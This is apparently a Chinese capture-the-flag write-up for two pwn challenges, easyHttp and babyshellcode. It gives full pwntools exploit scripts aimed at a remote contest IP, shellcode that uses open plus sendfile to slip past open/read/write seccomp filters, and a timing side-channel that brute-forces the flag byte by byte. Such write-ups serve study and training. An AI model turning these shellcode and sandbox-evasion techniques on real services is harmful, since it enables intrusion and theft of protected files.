能源赛 wp

主要记录这两道题里 shellcode 的几个巧妙用法(sendfile 式的 orw,以及基于时序的侧信道爆破)。

easyHttp

题目是一道简单的 HTTP 服务器。经检查,POST 到 /tryShellcode 的请求体会被当作 shellcode 执行;把 Content-Length 构造成与 shellcode 长度完全一致即可触发。沙盒禁止了 system,所以不走起 shell 的路线,而是让 shellcode 直接把 flag 文件的内容写到 stdout。

from pwn import *
# Target is 64-bit Linux; swap in the commented-out process() line to debug locally.
context.update(os='linux', arch='amd64')
# sh = process('./easyHttp')
sh = remote('106.14.120.231', 29792)
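def makeHeader(shellcode):
    """Build the POST /tryShellcode request whose body is *shellcode*.

    Content-Length is set to the exact shellcode length: the server only
    runs the body when the two agree (see the description above).

    NOTE(review): the original line was truncated in the listing; the tail
    (blank line + body) is reconstructed from the description.

    Args:
        shellcode: raw machine code.  bytes is expected; a str is encoded
            latin-1 so every byte value 0-255 round-trips unchanged
            (pwntools' asm() returns bytes on Python 3, str on Python 2).

    Returns:
        The complete request as bytes: request line, Content-Length header,
        blank line, then the shellcode unmodified.
    """
    if isinstance(shellcode, str):
        shellcode = shellcode.encode('latin-1')
    header = "POST /tryShellcode HTTP/1.0\r\nContent-Length: %d\r\n\r\n" % len(shellcode)
    return header.encode('ascii') + shellcode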
def Login():
    """Return the fixed /login request the server wants before /tryShellcode.

    The separators are reproduced exactly as the server accepts them: the
    NAME header ends in a bare "\\n", only the Pass header and the final
    blank line use "\\r\\n".
    """
    request_line = "POST /login HTTP/1.0"
    headers = "NAME: 1\nPass: 1"
    return request_line + "\r\n" + headers + "\r\n\r\n"
# gdb.attach(sh, 'b* $rebase(0x1F0F)')
# The server prints the same prompt before the login request and again before
# the shellcode request.
sh.recvuntil('test> \n')
sh.sendline(Login())
sh.recvuntil('test> \n')
# shellcraft.cat = open("flag") + sendfile(1, fd, 0, 0x7fffffff): the file goes
# straight to stdout without a read()/write() pair (see the listing below).
flag_dumper = asm(shellcraft.cat("flag", fd=1))
sh.sendline(makeHeader(flag_dumper))
sh.interactive()

这个题比较有意思的是 shellcraft.cat 的实现:它没有使用 read/write 系统调用,而是 open 之后直接 sendfile 到 stdout,可以说是另一种 orw。下面是 pwntools 在默认上下文(i386,int 0x80)下打印出来的汇编;上面脚本里设置了 context.arch='amd64',生成的应当是对应的 64 位版本(syscall 指令),思路相同。注意这种写法要求沙盒放行 sendfile——如果 seccomp 规则只允许 open/read/write 这类传统 orw 调用,它反而会被拦,动手前最好先用 seccomp-tools dump 一下规则。

/* Printed under pwntools' default context, i.e. i386 Linux (int 0x80, 32-bit
   registers, SYS_open = 5).  The exploit above runs with context.arch='amd64',
   which should yield the 64-bit counterpart of the same open + sendfile
   sequence -- TODO confirm by printing it under that context. */
>>> print shellcraft.cat("flag")
/* push 'flag\x00' */
push 1
dec byte ptr [esp]
/* the pushed 1 is decremented to 0 in place: a NUL terminator with no NUL
   byte in the code itself */
push 0x67616c66
/* open(file='esp', oflag='O_RDONLY', mode=0) */
mov ebx, esp
xor ecx, ecx
xor edx, edx
/* call open() */
push SYS_open /* 5 */
pop eax
int 0x80
/* sendfile(out_fd=1, in_fd='eax', offset=0, count=0x7fffffff) */
push 1
pop ebx
mov ecx, eax
xor edx, edx
push 0x7fffffff
pop esi
/* call sendfile() */
xor eax, eax
mov al, 0xbb
int 0x80
/* The kernel copies from the new fd to stdout itself: no read() and no
   write() is ever issued, which is why this slips past a filter aimed at the
   classic open/read/write pattern -- but sendfile (0xbb) itself must be
   permitted by the sandbox. */

babyshellcode

基本同 2020 年天翼杯 safebox 原题、2021 年蓝帽杯线下原题,找到网上 wp 修改一些关键部分的地址,采用侧信道方式爆破 flag 即可:shellcode 把 flag 读进内存后逐字节与猜测值比较,猜中就原地死循环(连接一直挂着直到超时),猜错就 ret 让进程退出(连接很快断开),用响应时间区分两种情况。网上模板用着还是不顺手,还是记一下自己的模板吧。

import time

from pwn import *

EXCV = context.binary = './chall'
e = ELF(EXCV)

context.update(arch='amd64', os='linux')

# `python exp.py I` turns on pwntools debug logging of every send/recv.
if args.I:
    context.log_level = 'debug'

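def pwn(p, index, ch):
    """Send the two-stage shellcode that tests one byte of the flag by timing.

    Stage 1 (padded to the 0x18 bytes the challenge accepts) read()s stage 2
    into 0x10100 and jumps there.  Stage 2 opens ./flag, reads up to 0x50
    bytes of it to 0x10040 and compares byte ``index`` with ``ch``: on a
    match it spins forever (the jz lands back on the cmp), otherwise it
    ``ret``s and the process dies.  The caller turns "did the connection stay
    open past the threshold" into a hit/miss.

    Args:
        p: pwntools tube (process or remote) positioned at the banner.
        index: byte offset into the flag buffer to test.  Only the first
            0x50 bytes are read, so larger offsets compare whatever is at
            0x10040+index instead of flag data.
        ch: candidate byte value, 0..255.

    Raises:
        ValueError: if ch is not a byte value, or if the assembled stage 2
            does not fit in the 0x100-byte read alongside the path suffix.
    """
    if not 0 <= ch <= 0xff:
        raise ValueError("ch must be a byte value, got %r" % (ch,))

    # Stage 1: read(0, 0x10100, 0x100); jmp 0x10100.  No value is loaded into
    # rax, so it relies on rax already being 0 (SYS_read) when the shellcode
    # starts -- presumably true for this binary, confirm in gdb if it misfires.
    stage1 = '''
    xor rdi, rdi;
    push 0x10100;
    pop rsi;
    push 0x100;
    pop rdx;
    syscall;
    jmp rsi;
    '''

    p.recvuntil('Are you a shellcode master?\n')
    p.send(asm(stage1).ljust(0x18, b'a'))

    # Stage 2, open("./flag", O_RDONLY): 0x67616c662f2e is "./flag" little-endian
    # and the 64-bit push leaves the two high bytes zero, so rsp points at a
    # NUL-terminated path.
    stage2 = "mov rax, 0x67616c662f2e; push rax; mov rdi,rsp;"
    stage2 += "xor esi, esi; xor rdx, rdx;"
    stage2 += "push 2; pop rax; syscall;"
    # Alternative kept from the template (path placed at a fixed address):
    # shellcode = "push 0x10032aaa; pop rdi; shr edi, 12; xor esi, esi; push 2; pop rax; syscall;"

    # Open a second time; the original note says the fd used below ends up as 4.
    # Why the first fd is not used is not explained -- presumably a template artefact.
    stage2 += "push 2; pop rax; syscall;"

    # read(fd, 0x10040, 0x50).  The buffer address is loaded as 0x10040aaa >> 12,
    # presumably to keep NUL bytes out of the immediate (a habit from the
    # template; the read() that delivers stage 2 would accept them anyway).
    stage2 += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x10040aaa; pop rsi; shr esi, 12; syscall;"

    # Oracle: cmp byte [rsi+index], ch.  With index == 0 the assembler emits a
    # 3-byte cmp (no displacement), otherwise a 4-byte one, hence the two jump
    # distances: the jz must land exactly on the cmp to loop forever on a match.
    if index == 0:
        stage2 += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(index, ch)
    else:
        stage2 += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(index, ch)

    code = asm(stage2)

    # The stage-1 read takes exactly 0x100 bytes and the last 14 carry the path
    # string.  ljust() silently does nothing when the code is already longer,
    # which would push the path past the buffer and corrupt the send -- fail
    # loudly instead.
    path = b'/home/pwn/flag'
    room = 0x100 - len(path)
    if len(code) > room:
        raise ValueError("stage 2 is %d bytes, only %d fit before the path" % (len(code), room))
    p.send(code.ljust(room, b'a') + path)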

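# Timing oracle: a matching byte makes stage 2 spin, so recv() runs into its
# timeout; a miss makes the process return and die almost immediately.
RECV_TIMEOUT = 2
MATCH_THRESHOLD = 1.5

index = 0
ans = []
while True:
    for ch in range(0x20, 127):          # printable ASCII only
        if args.R:
            p = remote('106.14.120.231', 28444)
        else:
            p = process(EXCV)
        pwn(p, index, ch)
        # monotonic(): a wall-clock adjustment must not be mistaken for a hit.
        start = time.monotonic()
        try:
            p.recv(timeout=RECV_TIMEOUT)
        except (EOFError, OSError):
            pass                          # target died: that is the "miss" signal
        elapsed = time.monotonic() - start
        p.close()
        if elapsed > MATCH_THRESHOLD:
            ans.append(ch)
            print("".join(chr(i) for i in ans))
            break
    else:
        # No candidate kept the process alive: end of the flag (or a byte
        # outside the printable range), so stop.
        print("".join(chr(i) for i in ans))
        break
    index = index + 1

print("".join(chr(i) for i in ans))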

# p = process(EXCV)
# gdb.attach(p)
# pwn(p,0, 0x20)